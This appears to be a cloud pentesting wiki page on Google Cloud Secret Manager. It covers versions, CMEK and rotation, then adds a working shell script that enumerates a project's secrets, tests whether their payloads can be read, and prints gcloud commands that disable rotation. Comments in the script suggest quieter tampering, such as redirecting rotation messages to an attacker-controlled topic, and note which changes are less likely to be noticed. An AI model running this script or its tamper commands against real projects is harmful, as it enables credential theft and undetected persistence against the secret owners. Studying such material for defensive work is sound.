GCP - Secrets Manager Enum
Secret Manager
Google Secret Manager is a vault-like service for storing passwords, API keys, certificates, small files and other sensitive data; each secret payload can be at most 64 KiB.
A secret is a container that can hold several versions, each storing different data; clients normally read the version `latest`.
Secret payloads are encrypted with a Google-managed key by default, but a Cloud KMS key can be selected instead (customer-managed encryption, CMEK); in that case reading the secret also requires decrypt access on that key.
Secret Manager does not rotate secrets by itself. A secret can be given a rotation schedule (a rotation period plus a next rotation time); when it fires, Secret Manager publishes a SECRET_ROTATE message to the Pub/Sub topics configured on the secret, and code subscribed to those topics (typically a Cloud Function) is what actually generates and adds the new version.
A secret can also be given an expiration (an expire time or a TTL); when that moment is reached the secret and all of its versions are deleted automatically.
Enumeration
Privilege Escalation
In the following page you can check how to abuse secretmanager permissions to escalate privileges.
GCP - Secretmanager Privesc
Post Exploitation
GCP - Secretmanager Post Exploitation
Persistence
GCP - Secret Manager Persistence
Rotation misuse
Because Secret Manager only publishes a rotation message and relies on subscriber code to do the actual rotation, an attacker with update permissions on the secret (secretmanager.secrets.update) can break rotation without ever touching the secret's value: remove the rotation schedule so no rotation message is sent and the secret is never modified, stretch the rotation period so it is rotated much less often, or change the Pub/Sub topics of the secret so the rotation message goes to a topic the attacker controls (or to none) instead of the one the rotation code listens on. Modifying the rotation code itself happens in a different service, usually a Cloud Function, so that requires privileged access over that function or whichever service hosts it.
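The following script, added here as an example and not part of the original page, covers both the empty Enumeration section above and the rotation misuse just described. It walks the secrets of a project with gcloud, and for each one records whether the latest version is readable with the current credentials, the KMS key if the secret uses CMEK, the expiry time, the rotation schedule and the Pub/Sub topics; for secrets that have a rotation schedule it prints the `gcloud secrets update` command that would stop it. The project id `my-project` is a placeholder and the script assumes an already authenticated gcloud.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate Secret Manager secrets
# with gcloud and summarise what an attacker cares about. Assumes gcloud is
# authenticated; PROJECT is a placeholder, override it in the environment.
# Permissions used: secretmanager.secrets.list, secretmanager.secrets.get,
# secretmanager.versions.access (and secrets.update for the tamper command).

PROJECT="${PROJECT:-my-project}"

# Short secret ids; basename() strips the projects/NUMBER/secrets/ prefix.
list_secrets() {
    gcloud secrets list --project "$PROJECT" --format='value(name.basename())'
}

# One tab-separated record per secret: rotationPeriod, nextRotationTime,
# expireTime, topics (';'-separated), kmsKeyName. gcloud leaves unset fields
# empty, so the column positions are stable.
describe_secret() {
    gcloud secrets describe "$1" --project "$PROJECT" \
        --format='value(rotation.rotationPeriod,rotation.nextRotationTime,expireTime,topics[].name,replication.automatic.customerManagedEncryption.kmsKeyName)'
}

# "yes" when the latest version can be read with the current credentials.
can_read_latest() {
    if gcloud secrets versions access latest --secret "$1" --project "$PROJECT" >/dev/null 2>&1; then
        echo yes
    else
        echo no
    fi
}

# Command that disables rotation for a secret that has a schedule (prints
# nothing otherwise). --remove-rotation-schedule drops both the period and the
# next rotation time, so no SECRET_ROTATE message is ever published again.
# Quieter alternatives: --rotation-period=8760h to make rotation rare, or
# --remove-topics=... --add-topics=... to redirect the message to a topic the
# attacker controls. --clear-topics would also silence every other event
# notification on the secret, which is more likely to be noticed.
rotation_tamper_cmd() {   # $1 = secret id, $2 = current rotationPeriod
    [ -n "$2" ] || return 0
    printf 'gcloud secrets update %s --project %s --remove-rotation-schedule\n' "$1" "$PROJECT"
}

field() { printf '%s\n' "$1" | cut -f"$2"; }              # tab-separated column
orv() { if [ -n "$1" ]; then printf '%s' "$1"; else printf '%s' '-'; fi; }

# One-line summary for a single secret id.
triage_secret() {
    rec=$(describe_secret "$1")
    period=$(field "$rec" 1); next=$(field "$rec" 2); expire=$(field "$rec" 3)
    topics=$(field "$rec" 4); kms=$(field "$rec" 5)
    printf '%s readable=%s cmek=%s expires=%s rotation=%s next=%s topics=%s\n' \
        "$1" "$(can_read_latest "$1")" "$(orv "$kms")" "$(orv "$expire")" \
        "$(orv "$period")" "$(orv "$next")" "$(orv "$topics")"
}

# Full run: triage every secret in the project, then the tamper commands.
enumerate_project() {
    for s in $(list_secrets); do
        triage_secret "$s"
        rotation_tamper_cmd "$s" "$(field "$(describe_secret "$s")" 1)"
    done
}

# Only run when explicitly asked, so the file can also be sourced:
#   RUN_ENUM=1 PROJECT=target-project sh enum_secrets.sh
if [ "${RUN_ENUM:-0}" = 1 ]; then enumerate_project; fi
```

The tamper command is printed rather than executed so the output can be reviewed first; a secret whose rotation period is already very long, or that has a schedule but no topics, is already effectively unrotated and needs no change.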